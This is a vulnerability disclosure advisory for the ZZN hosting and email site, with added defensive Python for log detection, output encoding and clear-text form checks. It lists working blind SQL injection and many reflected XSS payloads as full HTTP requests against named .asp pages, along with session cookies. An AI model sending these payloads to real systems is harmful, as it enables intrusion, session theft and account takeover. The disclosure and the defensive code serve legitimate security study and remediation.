ZZN (Web Hosting and Free email accounts) Blind SQL Injection / Cross Site Scripting / User credentials are sent in clear text
==================================================================================================================================================

Report-Timeline:
================
2013-07-18: Researcher Notification I
2013-07-19: Researcher Notification II
2013-07-20: Researcher Notification III
2013-07-20: Vendor Feedback
2013-07-22: Ask About the Issues I / No Response
2013-07-23: Ask About the Issues II / No Response
2013-07-26: No Response / Not Fixed
2013-08-02: No Response / Not Fixed
2013-08-09: Full Disclosure

I-VULNERABILITIES
======================
#Title: ZZN (Web Hosting and Free email accounts) Blind SQL Injection / Cross Site Scripting / User credentials are sent in clear text
#Vendor: http://www.zzn.com
#Author: Juan Carlos García (@secnight)
#Follow me: http://highsec.es
            http://hackingmadrid.blogspot.com
            Twitter: @secnight

II-Introduction:
======================
ZZN is a web hosting and e-mail service. ZZN mail lets you create your OWN Web site and customized email service. Users can sign up and log in to their email from www.your-name.zzn.com, or directly from your website.

-Build a great FREE Website
-Increase site stickiness by having users check their mail from your site.
-Brand your email colors and logos to those of your site.
-Choose from 14 interface languages.
-Promote your site using the tagline attached to every outgoing message.
-Keep in touch with your users using the mailing list feature.

III-PROOF OF CONCEPT
======================

BLIND SQL INJECTION
______________________________________
Blind SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating user input. An SQL injection occurs when a web application accepts user input that is placed directly into a SQL statement without properly filtering out dangerous characters.
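The time-based probe this advisory reports (a T-SQL `waitfor delay` injected through the `company` field of support_abuse.asp) leaves a recognisable trace in request logs. The following Python is an added example, not part of the advisory and not ZZN's code: it shows how a defender can triage logged requests for such probes by URL-decoding every parameter, matching the delay constructs of the common database engines, and correlating a match with the response time. The log lines and their tab-separated layout (method, path, body, response time in milliseconds) are constructed for the example and are not any real server's format.

```python
"""Flag logged requests carrying time-delay SQL injection probes.

Added example; it is not code from ZZN or from the advisory author. The log
lines are constructed for the example and their tab-separated layout
(method, path, form body, response time in ms) is an assumption.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructs that make the database pause. Legitimate form input never
# contains them, so a match is a strong blind-SQLi indicator.
DELAY_PATTERNS = [
    re.compile(r"waitfor\s+delay", re.I),   # Microsoft SQL Server
    re.compile(r"\bsleep\s*\(", re.I),       # MySQL
    re.compile(r"\bpg_sleep\s*\(", re.I),    # PostgreSQL
    re.compile(r"\bbenchmark\s*\(", re.I),   # MySQL CPU-burn variant
]

# Constructed sample log: method, path, form body, response time (ms).
# The first body carries the payload quoted in the advisory.
SAMPLE_LOG = [
    "POST\t/membersarea_en/support_abuse.asp\t"
    "beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20"
    "&Complaint=secnight&Email=sample@email.tst\t2140",
    "POST\t/membersarea_en/support_abuse.asp\t"
    "beenThere=yeah&company=Acme+Ltd&Complaint=spam&Email=sample@email.tst\t85",
    "GET\t/membersarea_en/home.asp?from=g1&s=www.zzn.com\t\t42",
]


def decoded_params(path, body):
    """Merge the URL-decoded query string and form body into {name: [values]}."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    return params


def find_delay_probes(params):
    """Return (parameter, decoded value) pairs that contain a delay construct."""
    return [
        (name, value)
        for name, values in params.items()
        for value in values
        if any(p.search(value) for p in DELAY_PATTERNS)
    ]


def analyse_log(lines, slow_ms=2000):
    """Return one finding per suspicious parameter.

    A matching payload whose response also took longer than slow_ms is the
    clearest sign that the database honoured the delay, i.e. the injected
    statement was executed rather than rejected.
    """
    findings = []
    for line in lines:
        method, path, body, response_ms = line.split("\t")
        for name, value in find_delay_probes(decoded_params(path, body)):
            findings.append({
                "method": method,
                "path": urlsplit(path).path,
                "param": name,
                "value": value,
                "response_ms": int(response_ms),
                "delay_observed": int(response_ms) >= slow_ms,
            })
    return findings


if __name__ == "__main__":
    for finding in analyse_log(SAMPLE_LOG):
        print(finding)
```

A pattern match is an indicator for triage, not a fix: the remediation for a page like support_abuse.asp is to hand the form fields to the database as bound parameters (in classic ASP, an ADODB.Command with Parameters) instead of concatenating them into the SQL statement, so that a quote or a `waitfor` in the input is only ever data.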
Attacks
-------
1-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=

2-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=

Multiple CROSS SITE SCRIPTING
_______________________________
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted, it will execute the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser.
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user and gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

Affected items
/membersarea_en/alertwindow.asp
/membersarea_en/copy%20of%20emailaccount.asp
/membersarea_en/directemailerror.asp
/membersarea_en/home.asp
/membersarea_en/insidelogin.asp
/membersarea_en/joinframes.asp
/membersarea_en/loginerror.asp
/membersarea_en/preminder.asp
/membersarea_en/signup.asp
/membersarea_en/support_abuse.asp

Proof Of Concept
----------------
These files have at least one input (GET or POST).
/membersarea_en/home.asp - 3 inputs
/membersarea_en/joinframes.asp - 2 inputs
/membersarea_en/emailaccount.asp - 4 inputs
/membersarea_en/preminder.asp - 1 input
/membersarea_en/signup.asp - 2 inputs
/membersarea_en/support.asp - 1 input
/membersarea_en/insidelogin.asp - 2 inputs
/membersarea_en/directemailerror.asp - 1 input
/membersarea_en/alertwindow.asp - 1 input
/membersarea_en/loginerror.asp - 1 input
/membersarea_en/support_abuse.asp - 1 input
/membersarea_en/copy%20of%20emailaccount.asp - 1 input
/membersarea_en/directregister.asp - 1 input
/zlog - 1 input
/zlog/blog_error.asp - 1 input

TOO MANY Cross Site Scripting: there are many more variants in both methods. I list these failures as examples, but I repeat, there are many more variants of these failures.

Method GET
----------
http://www.zzn.com/membersarea_en/alertwindow.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28903379%29%3c%2fScRiPt%3e
http://www.zzn.com/membersarea_en/directemailerror.asp?message=915766%27%28%29920634
http://www.zzn.com/membersarea_en/insidelogin.asp?fromPage=%22%20onmouseover%3dprompt%28908665%29%20bad%3d%22
http://www.zzn.com/membersarea_en/joinframes.asp?main=join&type=%22%20onmouseover%3dprompt%28922666%29%20bad%3d%22
http://www.zzn.com/membersarea_en/loginerror.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28958884%29%3c%2fScRiPt%3e
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=%22%20onmouseover%3dprompt%28910568%29%20bad%3d%22&LastName=&type=webmaster
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=%22%20onmouseover%3dprompt%28939138%29%20bad%3d%22&LastName=&type=website
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28927027%29%20bad%3d%22&type=webmaster
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28949012%29%20bad%3d%22&type=community
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28967610%29%20bad%3d%22&type=family
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28960668%29%20bad%3d%22&type=website
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=&type=%22%20onmouseover%3dprompt%28942440%29%20bad%3d%22

Method POST
-----------
POST /membersarea_en/copy%20of%20emailaccount.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

company=SECNIGHT&firstname=%22%20onmouseover%3dprompt%28968469%29%20bad%3d%22&Interface=0&lastname=secnight&LoginPage=1

POST /membersarea_en/copy%20of%20emailaccount.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

company=secnight&firstname=%22%20onmouseover%3dprompt%28960576%29%20bad%3d%22&Interface=0&lastname=secnight&LoginPage=1

POST /membersarea_en/home.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

DoLogin=True&image1=&LogFlag=1&SubDomain=999971%22%28%29997917&UserPassword=

POST /membersarea_en/insidelogin.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

DoLogin=True&FromFrames=True&FromWhere=false&image1=&origPage=20&SubDomain=986581%28%29996458&UserPassword=secnight

POST /membersarea_en/insidelogin.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

DoLogin=True&FromFrames=True&FromWhere=false&image1=&origPage=20&SubDomain=986581%28%29996458&UserPassword=g00dPa$$w0rD

POST /membersarea_en/preminder.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

NotFirstTime=true&rqHintSubDomain=%22%20onmouseover%3dprompt%28956443%29%20bad%3d%22

POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

confirm=&Country=__&DefaultLanguage=1&EMail=%22%20onmouseover%3dprompt%28927344%29%20bad%3d%22&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102

POST /membersarea_en/signup.asp?type=website HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=%22%20onmouseover%3dprompt%28961485%29%20bad%3d%22&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102

POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Length: 325
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=%22%20onmouseover%3dprompt%28948601%29%20bad%3d%22&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102

POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=%22%20onmouseover%3dprompt%28967492%29%20bad%3d%22&yob=0&zip=94102

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
beenThere=secnight&company=highsec&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=%22%20onmouseover%3dprompt%28983845%29%20bad%3d%22&VirtIP=

USER CREDENTIALS ARE SENT IN CLEAR TEXT
_______________________________________
User credentials are not encrypted when they are transmitted. A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection. Because user credentials are considered sensitive information, they should only be sent to the server over an encrypted connection.

Affected items
/membersarea_en/home.asp (13310f83d103a349490b8582539e8e21)
/membersarea_en/home.asp (4aaaffaf70dda99921aec4f1b2ceda9b)
/membersarea_en/insidelogin.asp
/membersarea_en/insidelogin.asp (4ea409a137fbaff8d5b639c5c42f16fb)
/membersarea_en/insidelogin.asp (58b6536a2fd7f196e5ff147122d20d98)
/membersarea_en/insidelogin.asp (67306227331ba5cbb21a0c2aebce7241)
/membersarea_en/insidelogin.asp (b67529bf426329db238325c03ba3ac46)
/membersarea_en/insidelogin.asp (b91e4b1df6bdc5d9e626034018953543)
/membersarea_en/loginbox.asp
/membersarea_en/signup.asp
/membersarea_en/signup.asp (134f342931a2e21525c6aa2cc3172a10)
/membersarea_en/signup.asp (6951aefa9721a0c5da3591ca525d49fe)
/membersarea_en/signup.asp (6afc2b9654e79ff801823fbaf74a6984)
/membersarea_en/signup.asp (80e7b7df44c32c456eb77aa274db4c08)
/membersarea_en/signup.asp (9791cfb3ed5d1e88c7a13337e5afb6da)
/membersarea_en/signup.asp (9b77eec0e71402d51f3f9b4bc0bd36f9)
/membersarea_en/signup.asp (c18e6bf01d3e39b1b9bccf1a50909498)
/membersarea_en/signup.asp (d087acb8154fc2e7ac71718a76ecf9b1)
/membersarea_en/signup.asp (d3c9ccf4d5c2c129b6eaa3c685ad11ef)
/membersarea_en/signup.asp (decad2f3bdc62c80a19d23c110dd40d4)
/membersarea_en/signup.asp (f321b396abface84ca2dc3a5facb1bd4)
/membersarea_en/signup.asp (f9583d9e844817a92b7f0743a7c9becf)

Examples (TOO MANY variants)

POST /membersarea_en/home.asp HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 8d3b79cd70a5d7b8b5b273ddce225c7a
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://www.ZZN.COM/membersarea_en/home.asp?from=g1&s=www.zzn.com
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.ZZN.COM
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

DoLogin=True&image1=&LogFlag=1&SubDomain=&UserPassword=

GET /membersarea_en/insidelogin.asp?fromPage=homepagez.asp

POST /membersarea_en/signup.asp?type= HTTP/1.1
Pragma: no-cache
Acunetix-Aspect-Password: 8d3b79cd70a5d7b8b5b273ddce225c7a
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://www.ZZN.COM/membersarea_en/signup.asp
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE
Host: www.ZZN.COM
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

confirm=&Country=AF&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102

IV. CREDITS
-------------------------
These vulnerabilities have been discovered by Juan Carlos García (@secnight)

V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage caused by the use or misuse of this information.
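The cross site scripting requests in section III all reflect a form field into HTML markup without encoding it; the reflected value `" onmouseover=prompt(...) bad="` works because the first double quote terminates the attribute the field was placed in. The following Python is an added example, not code from ZZN or from the advisory author: it renders the same kind of `<input>` both by raw concatenation and with attribute-context HTML encoding, then parses the result to show which attributes a browser would actually see. The `<input>` template is an assumption standing in for the affected .asp pages' forms; the field name `firstname` and the reflected value come from the advisory's requests.

```python
"""Attribute-context output encoding versus raw reflection.

Added example, not code from ZZN or from the advisory author. The <input>
template is an assumed stand-in for the affected pages' signup/login forms.
"""
from html import escape
from html.parser import HTMLParser

# The value reflected in several of the advisory's PoC requests, URL-decoded.
# It closes the current attribute, adds an event handler, and opens a dummy
# attribute so that the tag still parses cleanly.
PROBE = '" onmouseover=prompt(968469) bad="'


def render_unsafe(field, value):
    """Reflects the value by plain concatenation, as the affected pages do."""
    return '<input type="text" name="%s" value="%s">' % (field, value)


def render_safe(field, value):
    """Same markup, but each untrusted value is HTML-escaped with quote=True,
    so a double quote becomes &quot; and can no longer end the attribute."""
    return '<input type="text" name="%s" value="%s">' % (
        escape(field, quote=True), escape(value, quote=True))


class _AttrCollector(HTMLParser):
    """Records the attributes the parser sees on each start tag, with
    character references already decoded (as a browser would)."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)


def parsed_attributes(markup):
    """Return the [(name, value), ...] list the markup parses into."""
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attrs


def has_event_handler(markup):
    """True if any parsed attribute is an on* event handler."""
    return any(name.lower().startswith("on")
               for name, _ in parsed_attributes(markup))


if __name__ == "__main__":
    for renderer in (render_unsafe, render_safe):
        markup = renderer("firstname", PROBE)
        print(markup)
        print("  attributes:", parsed_attributes(markup))
        print("  event handler injected:", has_event_handler(markup))
```

The safe rendering preserves the user's text exactly (the parsed `value` attribute decodes back to the original string) while the injected handler never becomes an attribute. In classic ASP the equivalent of `escape(..., quote=True)` is `Server.HTMLEncode`, applied to every value at the point it is written into HTML; values written into JavaScript or URL contexts need the encoding appropriate to that context instead.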
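For the clear-text credentials issue, the check a defender wants is whether any form holding a password field would submit, or is itself served, over plain HTTP. The following Python is an added example, not code from ZZN or from the advisory author: it parses a page for such forms, resolves each form's action against the page URL, and reports the exposed ones. The page URL and the HTML are constructed for the example and only loosely modelled on the /membersarea_en login pages named above; the field names `SubDomain` and `UserPassword` come from the advisory's requests, and all other markup is an assumption.

```python
"""Find forms that would send credentials over plain HTTP.

Added example, not code from ZZN or from the advisory author. The page URL and
markup are constructed; the field names SubDomain and UserPassword come from
the advisory's requests, everything else is assumed.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

PAGE_URL = "http://www.zzn.com/membersarea_en/home.asp"

# Constructed page: one relative-action login form, one form that posts to an
# https URL, and one search form with no password field.
SAMPLE_HTML = """
<form method="post" action="home.asp">
  <input type="text" name="SubDomain">
  <input type="password" name="UserPassword">
</form>
<form method="post" action="https://www.zzn.com/membersarea_en/insidelogin.asp">
  <input type="text" name="SubDomain">
  <input type="password" name="UserPassword">
</form>
<form method="get" action="search.asp">
  <input type="text" name="q">
</form>
"""


class _FormScanner(HTMLParser):
    """Collects each <form>'s action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def cleartext_credential_forms(page_url, html):
    """Return [{'action': resolved URL, 'reason': ...}] for every password form
    whose credentials would cross the network unencrypted.

    A form posting to https from a page served over http is still reported:
    the page's markup (including the action) can be altered in transit before
    the user ever submits.
    """
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    findings = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        target = urljoin(page_url, form["action"])
        if urlsplit(target).scheme != "https":
            findings.append({"action": target, "reason": "form submits over http"})
        elif urlsplit(page_url).scheme != "https":
            findings.append({"action": target, "reason": "page served over http"})
    return findings


if __name__ == "__main__":
    for finding in cleartext_credential_forms(PAGE_URL, SAMPLE_HTML):
        print(finding["reason"] + ": " + finding["action"])
```

Run against the constructed page, both password forms are reported, for different reasons, and the search form is ignored; the same page served from an https URL produces no findings. The corresponding fix is to serve the login and signup pages and their form targets over HTTPS only, redirect http requests to https, and send a Strict-Transport-Security header so that returning browsers never start on the unencrypted port.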